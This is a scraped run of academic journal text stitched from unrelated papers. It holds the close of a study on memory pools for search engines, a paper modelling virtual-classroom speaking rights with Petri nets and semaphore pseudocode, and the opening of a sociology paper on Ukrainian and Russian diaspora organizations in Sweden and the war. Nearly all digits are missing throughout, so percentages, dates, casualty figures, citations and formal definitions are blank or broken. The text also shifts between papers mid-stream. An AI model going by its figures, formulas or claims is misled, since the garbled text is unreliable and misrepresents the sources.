average time . . . . . . performance test and analysis of recoverable variable length memory pool given a set of arrays with assigned sizefrom - , threads, insert delete action, then use a variable length memory pool to assign and storage an array of pointers, to release and reallocate, cycle times to get the test data results; using malloc to open the corresponding bytes of memory and assigning to another pointer array to storage. under the same conditions, compare the time of distribution and release of the system function. table is the test data, by analyzing and calculating: in terms of new,the efficiency of recyclelitepool is increased by . %. table testing data of recoverable variable length distributor(ms) number of times new recyclelitepool average time . . research on optimization of memory pool management for high concurrent service requests . performance test and analysis of allocate not free memory pool building a new distributor structure, alloc is interface of the distributor, using the space of distributor to allocate bytes every time, allocated times; as a contrast, the system call the new function to allocate bytes each time, to record the time of application action. table is the test data, by analyzing and calculating: in terms of new, the efficiency of stageppool is increased by . %. table testing data of allocate not free distributor(Μs) number of times stagepool newl average time . . . conclusion )three scenarios are obtained by analyzing the current search engines: hash table insert delete, cache update and document update module, query result return. three memory pools are designed for the three scenarios: recoverable fixed length memory pool and recoverable variable length memory pool and allocate not free memory pool were designed. )using thesystem default memory management function, malloc/free and new/delete. by analyzing of the various factors of the function. allocating and freeing memory on the heap increases overhead. the design of the memory pool is applied to the search engine system. it optimize the internal memory management and improve the search speed. for the test of the three memory pool, compared with the system’s default memory, its efficiency are increased by . %, . %, . %. sponsors or supporters this paper is partially supported by special research project of shaanxi provincial department of education “ jk ”. reference [ ] dai chunyan, xu zhiwen. discussion about malloc/free and new/delete in c++[j].science&technology international journal of advanced network monitoring and controls volume , no. , of baotou steel (group)corporation, ( ): [ ] li qian, pan minxue, li xuandong. benchmark of tools for memory leak [j]. journal of frontiers of computer science and technology. ( ) . [ ] wang xiaoyin, chen lijun. implementation and application of the memory pool in linux kernel [j]. journal of xi’an university of posts and telecommunications. ( ): . [ ] qu weihua, wang qun. introduce and analyzing of search engine principle [j]. computer knowledgeand technology. ( ): . [ ] duan bingying. study and design of web crawler in search engine [d]. xidian university. . [ ] guo bingxuan, zhang jingli, zhang zhichao. algorithm of spatial data scheduling based on memory pool [j]. computer engineering. , ( ): . [ ] liu tao, nie xiaofeng, jing jiwu, wang yuewu. memory management in worm simulation based on small object memory allocation technique on the gtnets [j]. journal of graduate university of chinese academy of sciences. , ( ): . [ ] guo xufeng, yu fang,liu zhongli. an efficient memory built-in self-repair method based on hash table [j]. acta electronica sinica. ( ): . [ ] lai xiangfang. select the appropriate stl containers [j]. digital technology and application. ( ): . [ ] alexandrescu a.modern c ++ design: generic programming and design patterns applied [m]. boston: addison-wesley professional. . [ ] robert w.p.luka, wai lamb. efficient in-memory extensible inverted file [j]. information systems, ( ): . authorbrief liu ping-ping( -), female, associate professor, xi’an technological university, research area: artificial intelligence international journal of advanced network monitoring and controls volume , no. , research of virtual network classroom collaborative mechanism based on petri net shengquan yang , shujuan huang school of computer science and engineering xi’an technological university, xi’an, china email: xaitysq@ .com; shujuanhuang@ .com abstract. in order to keep multi-role communication action of virtual network classroom orderly and correctly at the same time, this paper proposes and studies its communication collaborative relationship based on petri net. firstly, it introduces the basic theory and the system state change graph of the roles in virtual classroom, and discusses in detail the collaborative relationship between students and teacher in network environment. especially by taking advantage of petri net tool, this paper in virtue of formalized method describes and analyzes collaborative relationship and collaborative mechanism between teacher and students, which exists in the virtual classroom. finally, the collaborative mechanism has been realized successfully with the theory about process control concurrence view. keywords: virtual classroom, collaborative mechanism, petri net, process control . introduction the remote distance learning is a new generation educational pattern which is produced by the combination between computer network and the multimedia technologies today. it uses modern network and information technology to overcome geographic limitations of space, so that teachers, students can complete learning activities in different places. the modern distance learning is one kind of new education form which produces along with the present development of information technology, which is a principal means to construct people lifelong to study mode during the era of knowledge economy. in distance learning interactive system, although teachers and students living in different places, but it feels like in a classroom, in which the teachers and students can see each other and be able to hear mutually. but because all activities are carry on under the network environment, the teacher is the teaching activity main body, he must have lots of qualifications such as that he can control the student to join, to make the student withdraw, to ask questions to students, and can cause the student to obtain the right to speak, and can cancel the student to speak jurisdictions and so on. the students may ask questions to the teacher at any time. that is, in the entire teaching activities, each kind of activity which will occur will be concurrent, indefinite, and stochastic, therefore a collaborative mechanism must be studied successfully in order to suit the above characteristic, what’s more to maintain the orderliness of the whole teaching and learning activities. international journal of advanced network monitoring and controls volume , no. , . the cooperative relationship of virtual classroom virtual classroom is the local area network (lan) or wide area network (wan) space to create a virtual reality, interactive teaching and learning environment in order to achieve a variety of traditional classroom teaching function, which can provide a shared collaborative classroom learning environment for a geographically dispersed network of online teachers and students to so that it can be a variety of real-time communication and collaboration [ ]. in the virtual classroom, teacher and the students are acting with the traditional teaching in the same role, but in realizes specifically has the essential difference. this kind of difference mainly displays in the virtual classroom teaching process, because in the long- distance teaching the teacher and the student usually are in the different place, the overwhelming majority students in the network region also possibly are scattered, which causes each kind of concurrent activity becomes very complex. in order to accurately describe the synergy between teaching and learning activities, specific states which exist in teacher and students must be narrated clearly and concretely. (b) student in seven states figure. the states graph of teacher and student in virtual network classroom in teaching activities, there are two kinds of the teacher’s states (see figure -a): speak (teaching lectures) and listen to students speak, however student’s states (see figure -b) are: listen, speak, pause to speak, continue to speak, be cancelled speeches, be cancelled attendance, allow to speak and listen, a total of seven states. according to the changed states of teacher and student in figure , their collaborative relationships are described below : in the entire teaching process, there is only a speaker allowed, which either is the teacher, either is the student; at any time each role is played in between speaking and listening state, and what’s more their roles are transformed uncertainly in the two states. when the teacher is at the speech condition, the student listens, when the teacher asks questions or one student applies for speech and obtains the right research of virtual network classroom collaborative mechanism based on petri net to speak, this student starts to speak, but the teacher listens at the time; in order to control the entire ordering process of teaching students, the state change of students must be under the control of teachers, while teacher have rights to cancel the students to speak, to enable students to continue, abolish the “unpopular or unwelcome” students to speak, allowing students to listen and so on. in the network environment, all kinds of states in teaching will be a variety of unpredictable changes in concurrent operation, of which the appearance have many properties such as randomness, uncertainty and instability, etc. for example, students may ask questions at any time, a number of students to apply to speak, where there must be change between listen and speak, teachers and students how to coordinate and so on, it is necessary to control a variety of concurrent activities of a cooperative mechanism. . petri net model of cooperative relations coordination mechanism among the virtual classroom is a typical computer supported collaborative work of the problem, which is abbreviated as cscw. the so-called computer supported collaborative work that is more than one member of a group existed in some distributed network systems use multiple computers to work together to accomplish a task. because of this thinking is reflected in the information age groups, the way people work, interactive, distributed and collaborative nature of the objective requirements, it gives full play to the computer network as a potential communications media and superiority, which is being increasingly widely appreciated. that, computer supported cooperative work applied to the teaching field, is known as computer supported collaborative learning, abbreviated as cscl. petri net is a useful tool of graphical representation, which has a combination of available models, and it has much unique strengths when needing to find on the description and analysis of the phenomenon. petri net is also well and strict defined mathematical object; furthermore it may be appropriate not only to static structural analysis, but also to dynamic behavior analysis by way of the mathematical development of the petri net analysis methods and techniques[ ] [ ]. . establish the petri net model definition : a triple-type n = (s, t; f) can be called a net, if and only if ( ) ( ) ( )dom(f) ∪ cod(f)= s ∪ t and x˙={ y | ( y ∈ s ∪ t ) ∧ ((x, y) ∈ f )} are called the pre-set and rear-set. definition : quadruple pn = (p, t, f, m) can be called petri net, if and only if ) n = (p, t; f) is a net. ) m: s → z (set of non-negative integers) for the identity function, where m is the initial marking international journal of advanced network monitoring and controls volume , no. , (that is initial state) ) firing rules: when transition (migration change) t ∈ t can be called enabled under state m, if and only if s ∈ ˙t : m(p) ≥ ; from m the transition that t is enabled can lead to state changes, which is obtained subsequent identification m’ after triggering. petri net is consists of four different elements, as follows: place (p), with “o” expression, transition (t), with “—” expression, the arc of direction that connect place and transition, and the token in the place (token, with a “●” expression). place is used to describe the logic state of the system, and transition is used for the action and production process of all events. the input function (i) and the output function (o) expresses are used for contiguous function relations separately between the place and the transition, if a place is given a mark k (k is a non-negative integer), then the place has k tokens, also known as the place has been marked, thus a marked petri net in the definition can be decomposed into a quintuple pn = (p, t, i, o, m), m is the petri net state identification sets. the collaborative mechanism among the virtual network classroom can be described into a petri net, as shown in figure : figure. petri net model of the collaborative mechanism among the virtual network classroom the concrete description meaning see table , including: place p={ p ,p ,p ,p ,p ,p }, transition t={ t ,t ,t ,t ,t }, token ω=n+ in p indicates n student and teacher, token ● in p indicates that one speak right resource is available. research of virtual network classroom collaborative mechanism based on petri net table petri net model concrete description meaning . analyze the petri net model of the collaborative mechanism the description of figure is happen to the initial state of the system, which represents the teacher and student’s token are in the p place. teacher work flow showing is as follows: ) when teacher is teaching, the teacher needs to apply for the speak right to the system, then the t transition will work so that teacher token flows from the p place to the p place, which indicates that the teacher wants to get the speak right from the system, and by now if a student x is in the p place, then will enter ( ), otherwise will change over to ( ). ) the teacher has the highest priority of the system, this now if a student x is in the p place, which namely indicates that the student x is speaking, then the system sends out an event of letting this student x release speak right unconditionally, so that the t transition occurs, the student x flows from the p place to the p place, simultaneously the right to speak resources flow from the p place to the p place, which namely indicates that the right to speak will change from busy state to idle condition. ) because the right to speak resources are at the idling condition, the system allows the teacher to obtain the speech firstly, then the t transition occurs, teacher token flows from the p place to p the place, which indicates that the teacher is at teaching or the commentary condition; simultaneously the right to speak resources flow from the p place to the p place, which indicates that the right resources to speak is not available. ) the teacher speaks a subject or a section of curricula, then puts forward a question or permits some student inquiry, or lets the student in waiting queue who was spoke ago, the teacher sends out the release speak right event, the t transition occurs, the teacher flows from the p place to the p place, simultaneously the speak right resources flows from the p place to the p place, which namely indicates that the right to speak will change from busy state to idle condition. the system enters the next round of speak right resources competition recurrent state. student work flow showing is as follows: place state or behavior p the teacher or the student are at listen state p execute the task of applying for speak right resources p with obtained the speak right, can execute speak task p expressed that the student is at forbids to listen the teaching p indicated that the speak right resources is at the idling state p indicated that the speak right resources is at the using state transition command or event t send command to apply for speak t send command to apply for speak t send command to release the speak right resources t send command to cancel the students listening t send command to allow the students listening international journal of advanced network monitoring and controls volume , no. , ) when some student ask questions to teachers, the student must apply for the speak right to the system, t transition occurs, the student token x flow from p place to p place, which indicates that the student x is at applying for the right to speak condition. ) at this time, if the teacher is lecturing or other student in his speech, this student x will be at the waiting status in the p place, until the right to speak is changed from the busy to idle (idle) state, then transfers to ( ) to execute. ) because the right to speak resources is at the release condition, according to the priority of students waiting to speak, the system adopts a first-input-first-out (fifo) principle to serve for them, when student x ‘s priority is highest, t transition occurs, students x token flows from the p place to the p place, indicating that x is at the speech or inquires some question to teacher; simultaneously the right to speak resources flows from the p place to the p place, which indicates that the right to speak resources is occupied. ) if this student x inquires to teacher, it needs teacher the gap-like to answer the question, then after the student x speaks, the system sends out the suspension speech event, the t transition occurs, the student x flows from the p place to the p place, and the system inserts the student to the first position of the waiting queue that applies for the speak right resources, which indicates that it has the highest priority in the queue of the waiting speech students, simultaneously the right to speak resources flows from the p place to the p place, which namely indicates that the right to speak changes form by busy into the idle condition. by now it needs the teacher back and forth to answer questions for the topic, because teacher’s priority is highest, he does not use lining up, once the teacher requests to speak, the system enters teacher’s work flow immediately. ) in the midway, if teacher wants to cancel the current student x speech, then the teacher sends out cancels the current student to speak the event, which forces this student x unconditional release right to speak, the t transition occurs, so that the student x must flow from the p place to the p place, and the student transforms to listening state, simultaneously the right to speak resources flow from the p place to the p place, which namely indicates that the right to speak changes from busy into idle condition. the system enters the next round of speak right resources competition recurrent state. ) during the students listening process, when there is “not welcome” student existence discovered by the teacher, the teacher will send out cancel listening event for the “undesirable” student, the t transition occurs, the student x flows from the p place to the p place, the student transforms into the condition of forbidding to listen. ) when the student x sends out to the teacher an information that he is willing to observe the classroom discipline, and the teacher permits it’s again adding to listening, the teacher may sends out the event that joins the student x into listening, the t transition occurs, the student x from the p place flows to the p place, the student x transforms into the condition of permission listening. . model analysis of concurrent and conflict according to the petri net model knowledge which is described for collaborative mechanism of the virtual classroom, the student and the teacher are just like many advancements stochastically in the system interior, the concurrent movement [ ]. but when there are a lot of students common in the application for speak right state, for example, to research of virtual network classroom collaborative mechanism based on petri net identify the m = (m, u, , , , ), and t transition is enabled, the students, of which number is v, in the p place can flow into the p place, because: m [t ] m = (m,u-v,v, , -v, ) and, mi[t]mj expresses that the transition t stimulation (also calls ignition), causes the petri net by to mark mi to enter marks mj. but there is only one resources in the p place, it must guarantee that -v >= is correct only, and then makes sense. therefore, v <= , this means that any time a process can only be allowed to get the speech right. therefore, we must resolve their conflicts arising from the common run-time, critical resources, and the conflict is the essence of competition [ ]. . solution of resources competition conflict the process of multiple concurrent accesses to critical resources must be controlled to make the system to normal operation. with the aid of the process dispatching management game theory method in the operating system may solve this problem [ ]. the introduction of semaphore s (initial value is ) plus priority power and events event strategy. in s can be p operation and v operation. power and the event is defined as: power = show that the teachers priority, power = shows that students priority, event = cancel the speech, event = suspend the speech, event = there is no immediate action; p(s, power, event) definition is as follows: ) when power= and s< , if event= ,system will eliminate the speech advancement resources of the current process, which causes it transform to listen state; if event= , system will eliminate the speech advancement resources of the current process, which is inserted into the head of the blocking queue at once; if power= or s> , system immediately enters ( ); ) s = s - ; ) if s>= , then this process continues to carry on; ) if s < , then the process is blocked, and it is inserted into the blocking queue of semaphore s, then the system re-schedule another process to put into operation. v(s) definition is as follows: ) s=s+ ; ) if s>= , then this process continues to carry on; ) if s <= , which shows that there are some process that are blocked, the system must wake up the first blocking process in queue of semaphore s, so that it can be entered the ready queue and continue the operation of the process. international journal of advanced network monitoring and controls volume , no. , . implementation of collaborative mechanism ipremise: makes the teacher process is processt, and it has the highest priority; makes the student i process is processsi, and all students have the same level priority; strategy: ) when process processt is running and applying for the speak right resources, the system adopts “deprivation of way”, namely according to the event type which is sent out by processt, if it cancels the current process processsi to speak, the system will deprive processsi of the right to speak resources, transforms processsi to the listen condition; if suspends current processsi speaking, the system will eliminate processsi the right to speak resources, and insert process processsi into the first place of the student waiting blocking speech queue. ) when a processsi is running and applying for the speak right resources, the system will take “non- deprivation mode “, which enables the release of the current process that is using speak right resources, the system according to the principle of first come first served (fifo), will wake up the first place of the student waiting blocking speech queue, and make it obtain access to critical resources. finally an explanation point: when students are in the waiting blocking process speech queue, the state of the processsi is listening, that indicates waiting speech student retains the right to listen, which is consistent with the actual classroom. implementation parts of the codes are as follows: teacher process control routine similar as follows: processt_work begin …… p(s, , or );//apply for speak right resources // or cancel / suspend the current students to speak t process speak;//teaching …… t process ask question;//for students v(s); //release speak right resources …… end; every student process control routine similar as follows: processsi_work(i) begin …… si listen to teacher’s lecture;//in listening state …… p(s, , ); // apply for speak right resources si process speak;//for student v(s); //release speak right resources …… end; research of virtual network classroom collaborative mechanism based on petri net . conclusion the research of virtual classroom’s collaborative mechanism discussed in this paper have decomposed the complex question into simple forms very much, which has highly versatile and scientific rigor, and it provides a better model and a good method for other similar research, so it has high practical and referenced value . the author has utilized this model method successfully, which is designed for the actual development work of the chinese some university distance learning system, and it has made the very good movement progress. acknowledgment the research is supported by the state and provincial joint engineering laboratory of advanced network, monitoring and control. (financing projects no. gsysj ). references [ ] yu huang, wenhui hu, xin gao, hart-pin wang, “wsci formal model analysis based on petri nets”, computer engineering & science, vol. , pp. - , octoble [ ] yebai li, fuqi mao, “research of the verification in workflow process modeling on the application of petri nets ”, . ic e, . international conference on , sanya, pp. – , january [ ] zouaghi, l.; wagner, a.; badreddin, e., “hybrid, recursive, nested monitoring of control systems using petri nets and particle filters ”, dependable systems and networks workshops (dsn-w), international conference on, chicago, pp. – , august [ ] arpaia, p.; fiscarelli, l.; la commara, g.; romano, f., “a petri net-based software synchronizer for automatic measurement systems ”, instrumentation and measurement, ieee transactions on, vol. , pp. – , january [ ] mahgoub h hammad, alsadig mohammed, moawia e. eldow . , “design an electronic system use the audio fingerprint to access virtual classroom using artificial neural networks”, computer, communications, and control technology (i ct), international conference on, kuching, malaysia, pp. - , april [ ] ziyue ma , yin tong , zhiwu li , alessandro giua. “basis marking representation of petri net reachability spaces and its application to the reachability problem”, ieee transactions on automatic control, vol. , pp. - , may article | doi: . /connections- - connections ukrainian and russian organizations in sweden and the conflict back home sofiya voytiv stockholm university, sweden. e-mail: sofiya.voytiv@sociology. su.se abstract this paper investigates whether the maidan revolution in kyiv (late –early ) and the ongoing armed conflict in eastern ukraine (early ) have been reflected in the collaboration networks of ukrainian and russian organizations in sweden between and . i use erg models to account for the probabilities of ties between the organizations, depending on the network structure and individual attributes such as ethnic identification and the choice of a side to support in the conflict. results suggest that it is support for a certain side in the conflict, and not ethnic self-identification, which drives the clustering of the networks during the most violent period. keywords ethnic organizations, collaboration networks, ergm, foci of activity, armed conflict. in order to increase their influence and achieve certain other goals, most organizations tend to collaborate with other organizations that they believe share their perspectives and attitudes (portes et al., ). ethnic organizations mostly base their activities on perceptions of common “routes” and “roots” and tend to collaborate with similar others, and thus have a quite homophilous collaboration network. however, when a violent armed conflict in the homeland arises, it can be brought closer to the everyday space of diaspora through modern media and globalization processes (baser, ; brubaker, ; féron, ; féron and lefort, ; jabri, ; oberschall, ). for example, the development of modern media has allowed a lot of war and conflict-related events to be available and witness-able across the geographical spaces simultaneously (ukrainian revolution at the end of – beginning of has been streamed by multiple channels online; mosul battle streamed online via facebook, and others). a lot of ethnic/diasporic organizations in this context may mobilize their activism in order to show their support for or discontent with the events, especially if they perceive themselves as a group under attack (oberschall, ). for example, féron ( ; féron and lefort, ) discusses the case of conflict-generated diasporas that emerge as a direct response to the armed conflict in the home country. in addition, baser ( ) looks more closely at the realities of turks and kurds living in germany and sweden and compares their experiences, which lead to different outcomes for the relationships between the two groups in these specific contexts. other research on the interconnection of war in the homeland and diasporas include multiple case studies such as palestinian, irish, armenian, tamil, rwandan tutsi diasporas as well as studies of intergroup relations in the country of settlement, e.g., sikh–muslim relations in britain (féron, ; koinova, ; moliner, ; and others). however, this type of research is still quite scarce, while most of the diaspora studies focus mostly on the ways in which diasporas can affect the peace-building processes in their home countries, as well as the political unrest © author. this work is licensed under the creative commons attribution . license (https://creativecommons.org/licenses/by/ . /). issue | vol. ukrainian and russian organizations in sweden and the conflict back home that they can be a part of in the country of settlement (demmers, ; féron, ). nevertheless, all this research, among others, show that an ongoing armed conflict in the home country can have the potential to affect the collaboration networks, which different ethnic organizations build with each other. thus, shared ethnicity can lose its importance in how an organization decides to form a connection with another, and shared attitudes about the conflict can become a leading mechanism in forming collaborations. in other words, an ethnically homophilous collaboration network may reorient itself into clustering by attitudes toward the conflict, and thus actively choose to become homophilious based on that perceived value. an organization can, therefore, give a lesser degree of consideration to collaborate with another one solely on the basis of that organization’s claim of ethnic belonging, and choose the collaborations based on the perceived agreement on the politics in the home country. alternatively, there might be a reconfiguration of the meaning of ethnic belonging, namely the attitudes toward the conflict may become a substantial part of identifying the potential collaborator as a “true” co-ethnic or not, and thus leading to the action of working together or rejection of any association. in this paper, i focus on the collaboration networks of ukrainian, russian, and russian-speakers’ organizations in sweden to see the effects that their identified ethnicity and stand toward the conflict may have had on their structure. i account for the swedish context and trace the evolution of the network, including its growth through the creation of the conflict-generated organizations, i.e., organizations that both through their name and activity description claim the war in eastern ukraine to be their main focus, agenda, and reason for existence. i do not claim to see the causal relationship or to distinguish the exact impact of the war on the collaboration networks since i specifically focus on the through period that saw the beginning of war in eastern ukraine and was the most violent period in terms of casualties. however, i suggest that there are some indications that the reflections of war have at least been present in the studied collaboration networks and thus had a significant enough impact, especially in the ukrainian organizations’ case. focusing on this conflict is particularly interesting since it allows us to follow its development from the early stages onwards, as well as follow the changes in the diasporic communities, in the context of the relatively high freedom of organization that sweden provides. i suggest that the concept of homophily is useful to understand ethnic organizations’ collaboration before the armed conflict in eastern ukraine started, but the model of foci of activity is more applicable for the analysis of collaborations based on their attitudes toward the armed conflict. i suggest that engaging in activities that (do not) support a certain side in the conflict might have become a focus of activity for the organizations and reorganized the organizational field along the conflict lines that later became incorporated into the identification of the other organization’s ethnic belonging. thus, ethnicity in terms of similar ideas on one’s “roots and routes” may become less steering for the collaboration decisions than identification with a certain side in the conflict. the context of the study short background on the armed conflict in eastern ukraine the current armed conflict in eastern ukraine can be traced back to the beginning of the maidan revolution in november when the protests against then president yanukovych and the parliament of ukraine became large scale due to the president’s sudden decision not to sign a trade pact with the european union. by late february , there were more than a unarmed protesters that were killed, after which then president yanukovych fled the country and a new parliament was established (un documents for ukraine). in march , the russian federation annexed the crimean peninsula, an autonomous region within ukraine, claiming its ethnic belonging as russian and the “necessity of defending the russians in crimea” (address by president of the russian federation vladimir putin). soon thereafter, russian- backed rebels started an insurgency in two eastern regions of ukraine: luhansk and donetsk (the world bank: conflict in ukraine, ; osce statements). the most violent period of the conflict occurred in and . july also saw the downing of the mh flight by russian-backed insurgents in eastern ukraine (crash mh , ). the world bank organization estimates that over million people in eastern ukraine, specifically the donbas region, have been directly affected by the continuing conflict (the world bank: conflict in ukraine, ). according to a ocha report, the number of casualties due to the conflict was , , with , wounded and , killed (ocha, ). by , the number of those killed reached more than , (the world bank: conflict in ukraine, ; un documents for ukraine). in addition to casualties, . million people have been displaced. at the time of this writing, the official ceasefire has often been connections violated, and recent developments in the ukrainian– russian relations (russia seizing three naval ships in the azov sea in late november ) point to a new phase of the crisis (un emergency security council meeting on seized ukrainian vessels). swedish context: response to the conflict  in eastern ukraine and ukrainians and  russians in sweden sweden is a country with a high level of participation in civil society, with an astonishing number of , “civil society” organizations, out of which , are non-profit (statistikmyndigheten scb). it is relatively easy to register an organization if it is non-profit, including even applying for funding through the state. sweden is quite welcoming to different types of non-violent, non-terrorist, ethnic activism, which creates good grounds for practicing one’s ethnicity and taking part in homeland politics through demonstrations and other similar activities (baser, ). in the context of the ukrainian–russian conflict, sweden has been very supportive of ukraine. one example is the multiple visits by the swedish foreign affairs ex-ministers carl bildt (march, ) and margot wallström in . in addition, sweden has been offering humanitarian, financial, technical, and even police training aid to ukraine since the war unraveled, through organizations such as sida and riksbanken (the national bank of sweden) (sveriges riksbank and sida: ukraine). moreover, within its regional strategy for cooperation with eastern europe, launched in november , ukraine is the biggest recipient (european external action service – european commission). in , there were , people born in the russian federation and , born in ukraine living in sweden (statistikmyndigheten scb). according to the swedish migration office, of the people seeking asylum from ukraine during the years of the conflict, only applicants were approved in and just in (migrationsverket, ). thus, it can be assumed that the ukrainian population living in sweden has not been significantly affected by migration due to the armed conflict in eastern ukraine. however, the economic and political situation of ukraine has no doubt influenced the decision-making process of emigration from the country. the history of ukrainian and russian populations’ settlements in sweden is, to a great extent, speculative and mixed. throughout the soviet union period, most people coming from any republic within the union would often be counted either as soviet or russian. therefore, it is not easy to describe a clear and distinct history of every population. however, some knowledge has been passed on, both through the official governmental institutions, organizations, and individual people. the information below is based on interviews with the representatives of different russian, russian-speaking and ukrainian organizations, russian and ukrainian embassies, and swedish statistical bureau. when it comes to ukrainians in sweden throughout the twentieth century, one of the first bigger waves came as prisoners of the to winter war between finland and the soviet union as well as more coming during the later years of the second world war. by the mid- s, the community had managed to create some organizations (embassy of ukraine in sweden). another wave of immigration to sweden came with the collapse of the soviet union, and included mostly women. thus, by , there were men and , women born in ukraine living in sweden (statistikmyndigheten scb). this statistics, however, has to be viewed with caution since the registration by country of birth might have been mixed up with accounts of registering soviet union and not a particular soviet republic before the late soviet union collapse. the first big wave of emigration from russia in the twentieth century came with the first world war and the revolution, following thereafter with emigration caused by the second world war and finally, following the break-up of the soviet union. in the early s, the russian population in sweden consisted mostly of women (embassy of the russian federation in the kingdom of sweden). thus, by , there were , men and almost twice as much ( , ) women born in russia living in sweden (statistikmyndigheten scb). ukrainian and russian organizations in sweden also have interconnected, yet, distinct histories of existence in sweden (most of this information is obtained from the interviews with representatives from the ukrainian and russian ethnic organizations). many of these organizations were created before or after the second world war, and some changed from the so-called soviet “friendship” to independent nation-state-specific organizations. most of them claim a very long history of existence even before they were (or formally could be) registered. practicing activism based on cultural issues is rarely problematic in sweden, and organizations that mostly focus on maintaining traditions and celebrations from the home country can easily apply ukrainian and russian organizations in sweden and the conflict back home for funding from the state to organize such activities. on the other hand, to be a completely politically focused organization or one primarily occupied with humanitarian or other aid can be limiting, in terms of funding from the swedish state and require stronger argumentation. this is even more complex for openly political organizations (lagar för ideell förening – bolagsverket). therefore, many organizations may find it easier not to register with the state, although they do exist and organize meetings and events for their members. most of these organizations use online social media platforms, where they can freely converse and diverge from mainstream ideas and thoughts. all in all, the swedish context is one with a relatively high freedom of organizational engagement and expression, which makes it quite easy for the diasporic communities to organize and push their agenda, often relating to raising awareness about their homeland or their situation in the country of settlement. therefore, studying the collaboration networks in this context is not limited by the legal or oppressive regime structures in which similar practices cannot take place. here, it is also important to note that diaspora organizations, although often claiming to represent the totality of the group rarely do so (ragazzi, ). most often, diaspora groups are comprised of people who have a very special connection to the idea of “homeland” and stronger ethnic identification than their average co-ethnic. thus, this research cannot be generalized to the total populations of either ukrainians or russians in sweden, but only to very specific diasporic organizations with a strong and institutionalized sense of ethnic belonging. in addition, the research opens an important arena for studies on inter-ethnic and diasporic relations in the times of war in the home country. homophily the idea behind the concept of homophily is often summarized by a saying “birds of a feather flock together,” famously applied by mcpherson et al. ( ) and relates to the phenomenon that people tend to become friends with people who share some similar characteristics with them. homophily is an ambivalent process that makes the flow of information faster for similar others, while at the same time implies that this flow of information is localized and not different from whatever the similar others already share (mcpherson et al., ). mcpherson and smith-lovin ( ) distinguished between choice homophily and induced homophily. in their discussions, induced homophily covers the effect of group composition that is homogenous on the individual pairings with similar others. similarly, blau ( ) proposed that patterns of relationships including homophily are guided by relative group size and ability to gain contacts for in- and out- group. in other words, the opportunity structure within the homogeneous group/organization that a pair is in dictates that the pair is also homogenous. thus, in this view, baseline homophily reflects the composition at large and is affected by the relative size and pool of potential contacts. on the other hand, choice homophily is an individual bias or propensity to connect with similar others (coleman, ; mcpherson and smith-lovin, ; marsden, ). in other words, the composition at large has no effect on the homophily patterns in the group. multiple studies have pointed to how homophily can be stronger or weaker for different types of ties as well as different socio-demographic or behavioral/attitudinal categories within the given context. when it comes to socio-demographic categories, such as sex, gender, age, or ethnicity, studies have been variable. in the case of gender, homophily is especially interesting since the group sizes at large are almost equal. the fact that gender homophily is strongly present in different societies and groups showcases that there is an individual or structural bias, since the organizational foci are gendered, as are workplaces and other activities (mcpherson and smith-lovin, ; eder and hallinan, ). marsden ( ) after controlling for kin showed that network composition of people with whom others discuss important matters is strongly gendered. further, ibarra ( ) found that men have stronger sex homophilous ties than women. moreover, women with homophilous ties received support from other women and instrumental access through network ties to men, in her study of an advertising firm (ibarra, ). when it comes to age, homophily patterns depend on the type of ties studied (mcpherson and smith-lovin, ). in addition, since school classes are grouped by age, a strong baseline age homophily is induced (mcpherson et al., ). age homophily has also been shown to persist longer, most probably due to friendships formed at a younger age (mcpherson et al., ; marsden, , ). homophily and ethnicity homophily based on ethnicity is a special case and has been explained by both contact opportunities (group size) and biases. studies have shown that connections smaller ethnicized and racialized groups share more networks with majority groups (blau, ; marsden, ; mcpherson et al., ). on the other hand, other studies (marsden, , among others) have shown that this pattern may be different for certain groups, where a smaller group shows a tendency for homophily despite the baseline expectation that smaller ethnic groups’ networks should include more majority group members. one explanation that these studies give for this anti-intuitive pattern is that some organizational foci are segregated by ethnicity and thus limit opportunities and create bias. often, these overlap with social class and status. in the case of ethnic organizations, the process of defining ethnic belonging and cultural heritage becomes central and practical. these organizations are voluntary, and historically people have joined them in order to gain access to information networks and for work opportunities, among other things (portes et al., ). portes et al. ( ) write that in order to play a role in the nation- state politics on minorities, people often organize in a formal, stronger, way to exercise more power. similarly, ooka and wellman ( ) in their study on ethnic groups in toronto showed that newly arrived migrants tend to have more homophilous networks that can be explained by both ethnic segregation (of neighborhoods, voluntary organizations, language, schools, etc.) and hidden value homophily, like tastes and information. in the context of ethnic organizations, ethnicity is constantly made and maintained through various organized events and similar activities. scott feld’s ( ) foci of activity model is both complementary and explanatory for the analysis. feld suggests a theory of focused social ties based on the idea that social networks are organized through shared focus and joint activity. he states that individuals often have little choice in their association with certain foci. while some activities can be chosen by individuals who then create social networks around them (e.g., playing tennis), social foci can be better understood as social structures that systematically constrain the choices of relationship formations (e.g., only certain people play or want to play tennis). thus, people who are tied to each other through their relations to these focal activities also tend to be homogenous in other characteristics. feld derives three propositions from his model. first, since we meet to associate, most relationships originate in focused activities. second, these foci are usually homogeneous. third, if foci are homogeneous, the ties that are created there also tend to be homogeneous (mcpherson and smith-lovin, ; mcpherson et al., ). the main basis of identification in ethnic organizations is (obviously) ethnicity, and since almost every organization’s activities evolve around the cultural heritage of the group they represent, it makes little sense for them to be heterogeneous in terms of collaborations with other ethnic organizations. thus, unless two organizations share some similarities in their views on their “roots,” culture, or heritage, theoretically they should not have many reasons to collaborate. these similarities mostly relate to views on ethnicity and, in the case of russian, ukrainian, and russian-speaking organizations, showcase a complex and specific ethnic boundary- making process. one example is russian-speaking organizations, which can include people from almost every ex-soviet country. inclusion of different cultural and religious holidays in such organizations forms a pan- (often slavic)-ethnicity that connects all the specificities. in the case of ukrainian and russian organizations, the question of “similarity” of traditions and culture in general has been a loaded political topic, especially during the last several years when the war unraveled. the boundary between ukrainian and russian identifications has shifted continuously and is usually drawn on language spoken and/or country of origin. in the case of ethnic organizations, where each represents a group of people that are homogenous, at least in terms of how they self-identify through ethnicity (as someone representing a certain culture through membership in an organization), the focus of activity is usually traditions from the “homeland,” such as dancing or celebrating religious holidays, and relates to an already established sense of ethnic belonging (see discussion of homophily). however, when the war in the homeland starts abruptly, mobilization of the sense of ethnic belonging may lead to reinventing different activities and renegotiating collaborations on the basis of the attitude toward the ongoing war. ethnic organizations – due to their already strong connection to the idea of homeland (jabri, ; demmers, ; vertovec, ) – may regard taking a stand as a necessary point of activity in relation to their identification with certain ethnicity. however, if it is relatively easy to assign ethnicity to an organization through the already existing name, for example, the attitude toward the war could become a more complex process that is also related to maintaining the established ethnic identification. this may require more work, and organizations might feel the pressure to become active in support of or discontent with the ongoing situation at home. thus, the focus of their activities may shift, from primarily ethnicity-maintaining cultural events like celebrating shared perspectives on the history and traditions to relating primarily to the developments of the political situation currently ongoing at home. ukrainian and russian organizations in sweden and the conflict 